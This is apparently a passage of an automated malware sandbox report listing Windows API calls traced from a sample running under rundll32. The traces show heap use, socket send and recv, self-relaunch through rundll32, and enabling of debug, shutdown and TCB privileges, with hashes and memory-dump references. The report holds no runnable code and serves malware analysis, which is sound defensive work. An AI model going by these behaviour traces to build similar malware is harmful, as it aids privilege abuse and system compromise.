                                                                      • GetProcessHeap.KERNEL32(00000008,00000000,?,?,?,?,00000000,00000002), ref: 0485466C
                                                                      • HeapFree.KERNEL32(00000000), ref: 04854673
                                                                        • Part of subcall function 04853D0D: GetProcessHeap.KERNEL32(00000008,0000FFFF,?,74DEF380,?,?,?,04854269,?,00000000,?,?,?,00000000,00000100,?), ref: 04853D2B
                                                                        • Part of subcall function 04853D0D: HeapAlloc.KERNEL32(00000000,?,?,?,04854269,?,00000000,?,?,?,00000000,00000100,?,?,?,?), ref: 04853D34
                                                                        • Part of subcall function 04853D0D: GetProcessHeap.KERNEL32(00000008,00000027,00000000,?,?,?,04854269,?,00000000,?,?,?,00000000,00000100,?,?), ref: 04853D46
                                                                        • Part of subcall function 04853D0D: HeapAlloc.KERNEL32(00000000,?,?,?,04854269,?,00000000,?,?,?,00000000,00000100,?,?,?,?), ref: 04853D49
                                                                        • Part of subcall function 04853D0D: GetProcessHeap.KERNEL32(00000008,0000003D,?,?,?,04854269,?,00000000,?,?,?,00000000,00000100,?,?,?), ref: 04853D63
                                                                        • Part of subcall function 04853D0D: HeapAlloc.KERNEL32(00000000,?,?,?,04854269,?,00000000,?,?,?,00000000,00000100,?,?,?,?), ref: 04853D66
                                                                        • Part of subcall function 04853D0D: Sleep.KERNEL32(000007D0,00000000,?,?,00000000,00000000,?,?,?,?,04854269,?,00000000,?,?,?), ref: 04853E5B
                                                                        • Part of subcall function 04853D0D: GetProcessHeap.KERNEL32(00000008,00000029,?,?,?,04854269,?,00000000,?,?,?,00000000,00000100,?,?,?), ref: 04853E65
                                                                        • Part of subcall function 04853D0D: HeapAlloc.KERNEL32(00000000,?,?,?,04854269,?,00000000,?,?,?,00000000,00000100,?,?,?,?), ref: 04853E68
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.1763160749.0000000004851000.00000020.00001000.00020000.00000000.sdmp, Offset: 04850000, based on PE: true
                                                                      • Associated: 00000002.00000002.1763094965.0000000004850000.00000002.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000002.00000002.1763238261.000000000485D000.00000002.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000002.00000002.1763258082.0000000004863000.00000004.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000002.00000002.1763276462.0000000004869000.00000002.00001000.00020000.00000000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_4850000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: Heap$Process$AllocFree$Sleep$memset$htonsrandrecv
                                                                      • String ID:
                                                                      • API String ID: 2891003447-0
                                                                      • Opcode ID: 135bab54603521e7e12bd8bbfecabf3c9e120eefa834f979855ac8fc5b60f929
                                                                      • Instruction ID: 72a722d7726f0a99b5eb5c96653122c300c42bac091f9b8da16fad67bc1678c7
                                                                      • Opcode Fuzzy Hash: 135bab54603521e7e12bd8bbfecabf3c9e120eefa834f979855ac8fc5b60f929
                                                                      • Instruction Fuzzy Hash: 41F19E719047059FEB11CF44C840BAABBF6EF49704F088959ED4AAB361C3B5FA59CB90
                                                                      APIs
                                                                      • GetProcessHeap.KERNEL32(00000008,0000FFFF,?,00000000,00000000,?,0BADF00D,?,?,?,?,0485943A), ref: 0485206D
                                                                      • HeapAlloc.KERNEL32(00000000,?,?,?,?,0485943A), ref: 04852076
                                                                      • GetProcessHeap.KERNEL32(00000008,?,00000000,?,?,?,?,0485943A), ref: 0485209C
                                                                      • HeapAlloc.KERNEL32(00000000,?,?,?,?,0485943A), ref: 0485209F
                                                                      • htons.WS2_32(?), ref: 048520BC
                                                                      • send.WS2_32(?,00000000,?,00000000), ref: 04852131
                                                                      • recv.WS2_32(0000FFFF,?,0000FFFF,00000000), ref: 04852148
                                                                      • GetProcessHeap.KERNEL32(00000008,00000000,?,?,?,?,0485943A), ref: 04852168
                                                                      • HeapFree.KERNEL32(00000000,?,?,?,?,0485943A), ref: 0485216F
                                                                      • GetProcessHeap.KERNEL32(00000008,?,?,?,?,?,0485943A), ref: 0485217A
                                                                      • HeapFree.KERNEL32(00000000,?,?,?,?,0485943A), ref: 04852181
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.1763160749.0000000004851000.00000020.00001000.00020000.00000000.sdmp, Offset: 04850000, based on PE: true
                                                                      • Associated: 00000002.00000002.1763094965.0000000004850000.00000002.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000002.00000002.1763238261.000000000485D000.00000002.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000002.00000002.1763258082.0000000004863000.00000004.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000002.00000002.1763276462.0000000004869000.00000002.00001000.00020000.00000000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_4850000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: Heap$Process$AllocFree$htonsrecvsend
                                                                      • String ID:
                                                                      • API String ID: 1780562090-0
                                                                      • Opcode ID: 0e591c075ac6a42e245ca60fea4a7e766608afdccd06cafaeada824a0fef20be
                                                                      • Instruction ID: 232d1ce03c630722e8d772554fe00995e5a485d6c83b2c157f686e74c5c5a35e
                                                                      • Opcode Fuzzy Hash: 0e591c075ac6a42e245ca60fea4a7e766608afdccd06cafaeada824a0fef20be
                                                                      • Instruction Fuzzy Hash: 0041A07550034AABDF119FA8D888A9B7FF8EF49300F048598FD44DB291DB79E809CB60
                                                                      APIs
                                                                      • GetProcessHeap.KERNEL32(00000008,0000FFFF,?,00000000,?), ref: 04852E32
                                                                      • HeapAlloc.KERNEL32(00000000), ref: 04852E3B
                                                                      • GetProcessHeap.KERNEL32(00000008,00000048,74DEF380), ref: 04852E4D
                                                                      • HeapAlloc.KERNEL32(00000000), ref: 04852E50
                                                                      • htons.WS2_32(00000044), ref: 04852E68
                                                                      • send.WS2_32(0BADF00D,00000000,00000048,00000000), ref: 04852EF3
                                                                      • recv.WS2_32(0BADF00D,00000008,0000FFFF,00000000), ref: 04852F0B
                                                                      • GetProcessHeap.KERNEL32(00000008,00000000), ref: 04852F31
                                                                      • HeapFree.KERNEL32(00000000), ref: 04852F38
                                                                      • GetProcessHeap.KERNEL32(00000008,?), ref: 04852F43
                                                                      • HeapFree.KERNEL32(00000000), ref: 04852F4A
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.1763160749.0000000004851000.00000020.00001000.00020000.00000000.sdmp, Offset: 04850000, based on PE: true
                                                                      • Associated: 00000002.00000002.1763094965.0000000004850000.00000002.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000002.00000002.1763238261.000000000485D000.00000002.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000002.00000002.1763258082.0000000004863000.00000004.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000002.00000002.1763276462.0000000004869000.00000002.00001000.00020000.00000000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_4850000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: Heap$Process$AllocFree$htonsrecvsend
                                                                      • String ID:
                                                                      • API String ID: 1780562090-0
                                                                      • Opcode ID: a82b06aac18c77a7c25be2cd9f4a3b8fb4f343381a44a8babacbccd44b9a5ef7
                                                                      • Instruction ID: 5e359ff39a463afa026b55bd97ef87c6db6356e1226a72a4de0c5ae73efd743a
                                                                      • Opcode Fuzzy Hash: a82b06aac18c77a7c25be2cd9f4a3b8fb4f343381a44a8babacbccd44b9a5ef7
                                                                      • Instruction Fuzzy Hash: 3E41C335640345FAEB109FA4D845BAA7BB8FF48310F108999FE09DF291EB78D845CB18
                                                                      APIs
                                                                      • GetSystemDirectoryW.KERNEL32(?,0000030C), ref: 04857C0E
                                                                      • lstrcatW.KERNEL32(?,\rundll32.exe), ref: 04857C28
                                                                      • GetModuleFileNameW.KERNEL32(04867BC8,0000030C), ref: 04857C43
                                                                      • PathFindFileNameW.SHLWAPI(04867BC8,?), ref: 04857C51
                                                                      • wsprintfW.USER32 ref: 04857C6B
                                                                      • CreateProcessW.KERNEL32(?,?,00000000,00000000,00000000,08000000,00000000,00000000,?,?), ref: 04857CB3
                                                                      • ExitProcess.KERNEL32 ref: 04857CBA
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.1763160749.0000000004851000.00000020.00001000.00020000.00000000.sdmp, Offset: 04850000, based on PE: true
                                                                      • Associated: 00000002.00000002.1763094965.0000000004850000.00000002.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000002.00000002.1763238261.000000000485D000.00000002.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000002.00000002.1763258082.0000000004863000.00000004.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000002.00000002.1763276462.0000000004869000.00000002.00001000.00020000.00000000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_4850000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: FileNameProcess$CreateDirectoryExitFindModulePathSystemlstrcatwsprintf
                                                                      • String ID: %ws C:\Windows\%ws,#1 %ws$\rundll32.exe
                                                                      • API String ID: 3592876439-3730106045
                                                                      • Opcode ID: 4dd9b12436738fecec313bf18efc853b77d30be15d48f1e36923f070dd0aaa49
                                                                      • Instruction ID: 9dbd1c65de603d2ea1675568f373508d9e6281c093ff4523a2026faee2c8adba
                                                                      • Opcode Fuzzy Hash: 4dd9b12436738fecec313bf18efc853b77d30be15d48f1e36923f070dd0aaa49
                                                                      • Instruction Fuzzy Hash: F7116AB2500219AFEB119BA4DD48EEB77BCEF04305F048A66F906D6151DA38EE448F64
                                                                      APIs
                                                                      • GetProcessHeap.KERNEL32(00000008,?,75B0B010,00000000,00000000), ref: 048569E3
                                                                      • HeapAlloc.KERNEL32(00000000), ref: 048569EC
                                                                      • memcpy.MSVCRT(?,?,?), ref: 04856A19
                                                                      • GetProcessHeap.KERNEL32(00000008,?), ref: 04856A3D
                                                                      • HeapAlloc.KERNEL32(00000000), ref: 04856A40
                                                                      • memcpy.MSVCRT(?,?,?), ref: 04856A6F
                                                                      • GetProcessHeap.KERNEL32(00000000,?,?,?,?), ref: 04856A8F
                                                                      • HeapFree.KERNEL32(00000000), ref: 04856A92
                                                                      • GetProcessHeap.KERNEL32(00000000,?), ref: 04856A99
                                                                      • HeapFree.KERNEL32(00000000), ref: 04856A9C
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.1763160749.0000000004851000.00000020.00001000.00020000.00000000.sdmp, Offset: 04850000, based on PE: true
                                                                      • Associated: 00000002.00000002.1763094965.0000000004850000.00000002.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000002.00000002.1763238261.000000000485D000.00000002.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000002.00000002.1763258082.0000000004863000.00000004.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000002.00000002.1763276462.0000000004869000.00000002.00001000.00020000.00000000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_4850000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: Heap$Process$AllocFreememcpy
                                                                      • String ID:
                                                                      • API String ID: 3405790324-0
                                                                      • Opcode ID: e19e6eb500c2596f0ffa2053a0db4a371982190dcc5d38eeb1aa5b44d2cac80d
                                                                      • Instruction ID: cca1fd891f344f09ea4e301dc216e9ec827dd020eb861c651b469f5cc59f857c
                                                                      • Opcode Fuzzy Hash: e19e6eb500c2596f0ffa2053a0db4a371982190dcc5d38eeb1aa5b44d2cac80d
                                                                      • Instruction Fuzzy Hash: 8A31817590010AAFDB15AFA8CC45EAABBB9EF44344F058951ED08DB261E674F614CB90
                                                                      APIs
                                                                      • GetProcessHeap.KERNEL32(00000008,?,75BF73E0,00000000), ref: 048568EB
                                                                      • HeapAlloc.KERNEL32(00000000), ref: 048568F4
                                                                      • memcpy.MSVCRT(?,?,?), ref: 04856921
                                                                      • GetProcessHeap.KERNEL32(00000008,?,74DEE010), ref: 04856946
                                                                      • HeapAlloc.KERNEL32(00000000), ref: 04856949
                                                                      • memcpy.MSVCRT(?,?,?), ref: 04856978
                                                                      • GetProcessHeap.KERNEL32(00000000,?,?), ref: 04856995
                                                                      • HeapFree.KERNEL32(00000000), ref: 04856998
                                                                      • GetProcessHeap.KERNEL32(00000000,?), ref: 0485699F
                                                                      • HeapFree.KERNEL32(00000000), ref: 048569A2
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.1763160749.0000000004851000.00000020.00001000.00020000.00000000.sdmp, Offset: 04850000, based on PE: true
                                                                      • Associated: 00000002.00000002.1763094965.0000000004850000.00000002.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000002.00000002.1763238261.000000000485D000.00000002.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000002.00000002.1763258082.0000000004863000.00000004.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000002.00000002.1763276462.0000000004869000.00000002.00001000.00020000.00000000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_4850000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: Heap$Process$AllocFreememcpy
                                                                      • String ID:
                                                                      • API String ID: 3405790324-0
                                                                      • Opcode ID: 0e8c2f3526978778d6da192a2211327fa181bedc67accab00aaf8f04a7931d8e
                                                                      • Instruction ID: 7c564073bb85cbb6285730bed559b821b2fa98b433a06ae1d61a7c08fed05cad
                                                                      • Opcode Fuzzy Hash: 0e8c2f3526978778d6da192a2211327fa181bedc67accab00aaf8f04a7931d8e
                                                                      • Instruction Fuzzy Hash: EE315E7590010AAFDB14EFA8CC45EAFBBB8EF48354F058955ED08DB261E674EA14CB90
                                                                      APIs
                                                                      • GetProcessHeap.KERNEL32(00000008,00000027,?,00000000,?,?,?,0485423D,?,?,?,?,00000000,00000002), ref: 048540F8
                                                                      • HeapAlloc.KERNEL32(00000000,?,?,?,0485423D,?,?,?,?,00000000,00000002), ref: 048540FB
                                                                      • GetProcessHeap.KERNEL32(00000008,00000009,?,?,?,0485423D,?,?,?,?,00000000,00000002), ref: 04854148
                                                                      • HeapAlloc.KERNEL32(00000000,?,?,?,0485423D,?,?,?,?,00000000,00000002), ref: 0485414B
                                                                      • Sleep.KERNEL32(000007D0,00000000,?,?,00000000,00000000,?,?,?,?,0485423D,?,?,?,?,00000000), ref: 04854184
                                                                      • Sleep.KERNEL32(000007D0,00000000,?,?,00000000,?,0485423E,?,?,?,0485423D,?,?,?,?,00000000), ref: 048541BC
                                                                      • GetProcessHeap.KERNEL32(00000008,00000000,00000000,?,?,00000000,00000000,?,?,?,?,0485423D,?,?,?,?), ref: 048541CB
                                                                      • HeapFree.KERNEL32(00000000,?,?,?,0485423D,?,?,?,?,00000000,00000002), ref: 048541CE
                                                                      • GetProcessHeap.KERNEL32(00000008,00000000,?,?,?,0485423D,?,?,?,?,00000000,00000002), ref: 048541D7
                                                                      • HeapFree.KERNEL32(00000000,?,?,?,0485423D,?,?,?,?,00000000,00000002), ref: 048541DA
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.1763160749.0000000004851000.00000020.00001000.00020000.00000000.sdmp, Offset: 04850000, based on PE: true
                                                                      • Associated: 00000002.00000002.1763094965.0000000004850000.00000002.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000002.00000002.1763238261.000000000485D000.00000002.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000002.00000002.1763258082.0000000004863000.00000004.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000002.00000002.1763276462.0000000004869000.00000002.00001000.00020000.00000000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_4850000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: Heap$Process$AllocFreeSleep
                                                                      • String ID:
                                                                      • API String ID: 1437939644-0
                                                                      • Opcode ID: 8063a9faf52ec61bcbef540681215b10a971d62859a5c5a4e030d1c6fef57322
                                                                      • Instruction ID: ea1070b254a87fb6257d52a0991328aac523aee61a2c3f53d7a99af918f54e68
                                                                      • Opcode Fuzzy Hash: 8063a9faf52ec61bcbef540681215b10a971d62859a5c5a4e030d1c6fef57322
                                                                      • Instruction Fuzzy Hash: 2131B074440305ABDB20AF65D808B6BBFF8FF49701F008909FD89DA2A0D778E885DB60
                                                                      APIs
                                                                      • GetTickCount.KERNEL32 ref: 048578AF
                                                                      • srand.MSVCRT ref: 048578B2
                                                                      • GetTickCount.KERNEL32 ref: 048578B9
                                                                        • Part of subcall function 04857CC5: GetCurrentProcess.KERNEL32(00000028,?,?,00000000,?,?,?,048579E8), ref: 04857CE9
                                                                        • Part of subcall function 04857CC5: OpenProcessToken.ADVAPI32(00000000,?,00000000,?,?,?,048579E8), ref: 04857CF0
                                                                        • Part of subcall function 04857CC5: LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 04857D02
                                                                        • Part of subcall function 04857CC5: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00000000), ref: 04857D25
                                                                        • Part of subcall function 04857CC5: GetLastError.KERNEL32(?,00000000), ref: 04857D2D
                                                                        • Part of subcall function 04857CC5: SetLastError.KERNEL32(?,?,00000000,?,?,?,048579E8), ref: 04857D3F
                                                                      • GetModuleFileNameW.KERNEL32(04867BC8,0000030C,?,00000004,SeTcbPrivilege,SeDebugPrivilege,SeShutdownPrivilege,?,?,048579E8), ref: 04857926
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.1763160749.0000000004851000.00000020.00001000.00020000.00000000.sdmp, Offset: 04850000, based on PE: true
                                                                      • Associated: 00000002.00000002.1763094965.0000000004850000.00000002.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000002.00000002.1763238261.000000000485D000.00000002.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000002.00000002.1763258082.0000000004863000.00000004.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000002.00000002.1763276462.0000000004869000.00000002.00001000.00020000.00000000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_4850000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: CountErrorLastProcessTickToken$AdjustCurrentFileLookupModuleNameOpenPrivilegePrivilegesValuesrand
                                                                      • String ID: SeDebugPrivilege$SeShutdownPrivilege$SeTcbPrivilege
                                                                      • API String ID: 1536163209-50072501
                                                                      • Opcode ID: 29efa9ff2ba4c498afb83a6f5ade7a662b640bd321ec25dce963720c91d44c62
                                                                      • Instruction ID: a7c49654243a3f50e5a3174e01ee04105674d188c31f737d47fa53a8fe9ace81
                                                                      • Opcode Fuzzy Hash: 29efa9ff2ba4c498afb83a6f5ade7a662b640bd321ec25dce963720c91d44c62
                                                                      • Instruction Fuzzy Hash: 11011271D50310DBE750BB7A9809A4A7EADEB04698F049E55ED11D2154DBBCEC00DBE1
                                                                      APIs
                                                                      • GetProcessHeap.KERNEL32(00000008,00000068,74DEF380,?,76ED5E70,?,048551F9,?,?,?), ref: 04854F56
                                                                      • HeapAlloc.KERNEL32(00000000,?,048551F9,?,?,?), ref: 04854F5D
                                                                      • rand.MSVCRT ref: 04854F86
                                                                      • GetProcessHeap.KERNEL32(00000008,?,048551F9,?,00000000,?,048551F9,048551F9,?,00000000,00000000,000000FF,00000008,00000000,00000068), ref: 04854FF7
                                                                      • HeapFree.KERNEL32(00000000), ref: 04854FFE
                                                                      • GetProcessHeap.KERNEL32(00000008,00000000,048551F9,?,00000000,00000000,000000FF,00000008,00000000,00000068,?,048551F9,?,?,?), ref: 04855007
                                                                      • HeapFree.KERNEL32(00000000,?,048551F9,?,?,?), ref: 0485500E
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.1763160749.0000000004851000.00000020.00001000.00020000.00000000.sdmp, Offset: 04850000, based on PE: true
                                                                      • Associated: 00000002.00000002.1763094965.0000000004850000.00000002.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000002.00000002.1763238261.000000000485D000.00000002.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000002.00000002.1763258082.0000000004863000.00000004.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000002.00000002.1763276462.0000000004869000.00000002.00001000.00020000.00000000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_4850000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: Heap$Process$Free$Allocrand
                                                                      • String ID: p
                                                                      • API String ID: 2875874559-2181537457
                                                                      APIs
                                                                      • CreateFileW.KERNEL32(04867BC8,80000000,00000001,00000000,00000003,00000000,00000000), ref: 0485884F
                                                                      • GetFileSize.KERNEL32(00000000,00000000), ref: 04858860
                                                                      • GetProcessHeap.KERNEL32(00000000,00000000), ref: 0485886F
                                                                      • HeapAlloc.KERNEL32(00000000), ref: 04858876
                                                                      • ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 0485888F
                                                                      • GetProcessHeap.KERNEL32(00000000,00000000), ref: 048588A0
                                                                      • HeapFree.KERNEL32(00000000), ref: 048588A7
                                                                      • CloseHandle.KERNEL32(?), ref: 048588C6
                                                                      Similarity
                                                                      • API ID: Heap$File$Process$AllocCloseCreateFreeHandleReadSize
                                                                      • String ID:
                                                                      • API String ID: 3250796435-0
                                                                      APIs
                                                                      • GetProcessHeap.KERNEL32(00000008,?,00000000,?,?,?,04853745,?,?,?,00000000,00000000,?,?,?,04854A6E), ref: 048533BB
                                                                      • HeapAlloc.KERNEL32(00000000,?,04853745,?,?,?,00000000,00000000,?,?,?,04854A6E,?,?,?,?), ref: 048533C2
                                                                      • htons.WS2_32(?), ref: 048533E1
                                                                      • memcpy.MSVCRT(00000037,?,?,?,04853745,?,?,?,00000000,00000000,?,?,?,04854A6E,?,?), ref: 04853410
                                                                      • send.WS2_32(?,00000000,?,00000000), ref: 04853421
                                                                      • GetProcessHeap.KERNEL32(00000008,00000000), ref: 04853434
                                                                      • HeapFree.KERNEL32(00000000), ref: 0485343B
                                                                      Similarity
                                                                      • API ID: Heap$Process$AllocFreehtonsmemcpysend
                                                                      • String ID:
                                                                      • API String ID: 4260819906-0
                                                                      APIs
                                                                      • GetProcessHeap.KERNEL32(00000008,?,00000000,?,?,?,04853BAA,?,?,?,00000000,00000000,?,?,?,04854A6E), ref: 04853220
                                                                      • HeapAlloc.KERNEL32(00000000,?,04853BAA,?,?,?,00000000,00000000,?,?,?,04854A6E,?,?,?,?), ref: 04853227
                                                                      • htons.WS2_32(?), ref: 04853246
                                                                      • memcpy.MSVCRT(0000004B,?,?,?,04853BAA,?,?,?,00000000,00000000,?,?,?,04854A6E,?,?), ref: 04853276
                                                                      • send.WS2_32(?,00000000,?,00000000), ref: 04853287
                                                                      • GetProcessHeap.KERNEL32(00000008,00000000), ref: 0485329A
                                                                      • HeapFree.KERNEL32(00000000), ref: 048532A1
                                                                      Similarity
                                                                      • API ID: Heap$Process$AllocFreehtonsmemcpysend
                                                                      • String ID:
                                                                      • API String ID: 4260819906-0
                                                                      APIs
                                                                      • GetProcessHeap.KERNEL32(00000000,?,74DEF380,76ED5E70,?,?,04856CBD,?,?,00000000,?,04857A55,00000024,04856AA8,00000000,0000FFFF), ref: 04856C29
                                                                      • HeapFree.KERNEL32(00000000,?,?,04856CBD,?,?,00000000,?,04857A55,00000024,04856AA8,00000000,0000FFFF), ref: 04856C2C
                                                                      • GetProcessHeap.KERNEL32(00000000,?,74DEF380,76ED5E70,?,?,04856CBD,?,?,00000000,?,04857A55,00000024,04856AA8,00000000,0000FFFF), ref: 04856C39
                                                                      • HeapFree.KERNEL32(00000000,?,?,04856CBD,?,?,00000000,?,04857A55,00000024,04856AA8,00000000,0000FFFF), ref: 04856C3C
                                                                      • GetProcessHeap.KERNEL32(00000000,?,74DEF380,76ED5E70,?,?,04856CBD,?,?,00000000,?,04857A55,00000024,04856AA8,00000000,0000FFFF), ref: 04856C4E
                                                                      • HeapFree.KERNEL32(00000000,?,?,04856CBD,?,?,00000000,?,04857A55,00000024,04856AA8,00000000,0000FFFF), ref: 04856C51
                                                                      • GetProcessHeap.KERNEL32(00000000,00000000,74DEF380,76ED5E70,?,?,04856CBD,?,?,00000000,?,04857A55,00000024,04856AA8,00000000,0000FFFF), ref: 04856C56
                                                                      • HeapFree.KERNEL32(00000000,?,?,04856CBD,?,?,00000000,?,04857A55,00000024,04856AA8,00000000,0000FFFF), ref: 04856C59
                                                                      Similarity
                                                                      • API ID: Heap$FreeProcess
                                                                      • String ID:
                                                                      • API String ID: 3859560861-0
                                                                      APIs
                                                                      • CommandLineToArgvW.SHELL32(?,?,00000000,?,?,?,?,04857A8E,?), ref: 04856566
                                                                      • StrToIntW.SHLWAPI(00000000,?,?,?,?,04857A8E,?), ref: 04856581
                                                                      • StrStrW.SHLWAPI(00000000,04861580,?,?,?,?,?,04857A8E,?), ref: 048565B3
                                                                      • StrStrW.SHLWAPI(00000000,04861588,?,?,?,?,?,04857A8E,?), ref: 048565CD
                                                                      • StrChrW.SHLWAPI(00000000,0000003A,?,?,?,?,?,04857A8E,?), ref: 048565DF
                                                                      • LocalFree.KERNEL32(00000000,?,?,?,?,04857A8E,?), ref: 04856607
                                                                      Similarity
                                                                      • API ID: ArgvCommandFreeLineLocal
                                                                      • String ID:
                                                                      • API String ID: 1203019955-0
                                                                      APIs
                                                                        • Part of subcall function 04856CED: GetProcessHeap.KERNEL32(00000008,00000008,00000000,?,?,04856B24,00000000,00000000,00000000,00000000,?,0485A09A,04856AA8,00000000,00000000,00000000), ref: 04856CFC
                                                                        • Part of subcall function 04856CED: HeapAlloc.KERNEL32(00000000,?,?,04856B24,00000000,00000000,00000000,00000000,?,0485A09A,04856AA8,00000000,00000000,00000000,00000024,04856AA8), ref: 04856CFF
                                                                        • Part of subcall function 04856CED: GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,04856B24,00000000,00000000,00000000,00000000,?,0485A09A,04856AA8,00000000,00000000,00000000), ref: 04856D24
                                                                        • Part of subcall function 04856CED: HeapFree.KERNEL32(00000000,?,?,04856B24,00000000,00000000,00000000,00000000,?,0485A09A,04856AA8,00000000,00000000,00000000,00000024,04856AA8), ref: 04856D27
                                                                      • CreateThread.KERNEL32(00000000,00000000,0485988B,?,00000004,00000000), ref: 048598FD
                                                                      • SetThreadToken.ADVAPI32(?,?,?,0485A15C,?,?), ref: 0485990F
                                                                      • ResumeThread.KERNEL32(?,?,0485A15C,?,?), ref: 0485991C
                                                                      • WaitForSingleObject.KERNEL32(?,000000FF,?,0485A15C,?,?), ref: 0485992C
                                                                      • GetLastError.KERNEL32(?,0485A15C,?,?), ref: 04859934
                                                                      • CloseHandle.KERNEL32(?,?,0485A15C,?,?), ref: 0485993D
                                                                      Similarity
                                                                      • API ID: Heap$Thread$Process$AllocCloseCreateErrorFreeHandleLastObjectResumeSingleTokenWait
                                                                      • String ID:
                                                                      • API String ID: 298440786-0
                                                                      APIs
                                                                        • Part of subcall function 04856477: GetTickCount.KERNEL32 ref: 04856477
                                                                      • wsprintfW.USER32 ref: 04856758
                                                                      • EnterCriticalSection.KERNEL32(04867B9C,00007FD3,?,00000028), ref: 04856783
                                                                      • StrCatW.SHLWAPI(?,?), ref: 048567D1
                                                                      • StrCatW.SHLWAPI(?,04863B90), ref: 048567D7
                                                                      • SetLastError.KERNEL32(0000007A), ref: 048567DF
                                                                      • LeaveCriticalSection.KERNEL32(04867B9C), ref: 048567EA
                                                                      Similarity
                                                                      • API ID: CriticalSection$CountEnterErrorLastLeaveTickwsprintf
                                                                      • String ID:
                                                                      • API String ID: 230659905-0
                                                                      APIs
                                                                      • CreateThread.KERNEL32(00000000,00000000,0485A016,00000000,00000004,00000000), ref: 0485A3C9
                                                                      • SetThreadToken.ADVAPI32(?,?,?,?,04857B43,?,?,00000004,0485787C,00000000,000000FF), ref: 0485A3DD
                                                                      • ResumeThread.KERNEL32(?,?,?,04857B43,?,?,00000004,0485787C,00000000,000000FF), ref: 0485A3EA
                                                                      • GetLastError.KERNEL32(?,?,04857B43,?,?,00000004,0485787C,00000000,000000FF), ref: 0485A3F7
                                                                      • CloseHandle.KERNEL32(?,?,?,04857B43,?,?,00000004,0485787C,00000000,000000FF), ref: 0485A402
                                                                      • SetLastError.KERNEL32(00000057,?,?,04857B43,?,?,00000004,0485787C,00000000,000000FF), ref: 0485A411
                                                                      Similarity
                                                                      • API ID: Thread$ErrorLast$CloseCreateHandleResumeToken
                                                                      • String ID:
                                                                      • API String ID: 2435877492-0
                                                                      APIs
                                                                      • CreateThread.KERNEL32(00000000,00000000,04857957,00000000,00000004,00000000), ref: 04857988
                                                                      • SetThreadToken.ADVAPI32(?,00000000,?,?,?,04857B4A,?,?,?,00000004,0485787C,00000000,000000FF), ref: 0485799C
                                                                      • ResumeThread.KERNEL32(?,?,?,?,04857B4A,?,?,?,00000004,0485787C,00000000,000000FF), ref: 048579A9
                                                                      • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,04857B4A,?,?,?,00000004,0485787C,00000000,000000FF), ref: 048579B9
                                                                      • GetLastError.KERNEL32(?,?,?,04857B4A,?,?,?,00000004,0485787C,00000000,000000FF), ref: 048579C1
                                                                      • CloseHandle.KERNEL32(?,?,?,?,04857B4A,?,?,?,00000004,0485787C,00000000,000000FF), ref: 048579CA
                                                                      Similarity
                                                                      • API ID: Thread$CloseCreateErrorHandleLastObjectResumeSingleTokenWait
                                                                      • String ID:
                                                                      • API String ID: 1168161173-0
                                                                      • Opcode ID: 938853420387fcb7b0da16c723d8409da99296c76ec85b9f8d0e147c53ae9c45
                                                                      • Instruction ID: 39cde080878bfe827c68a40f132bb897ab3157d47bce7801cd716f27855c72d0
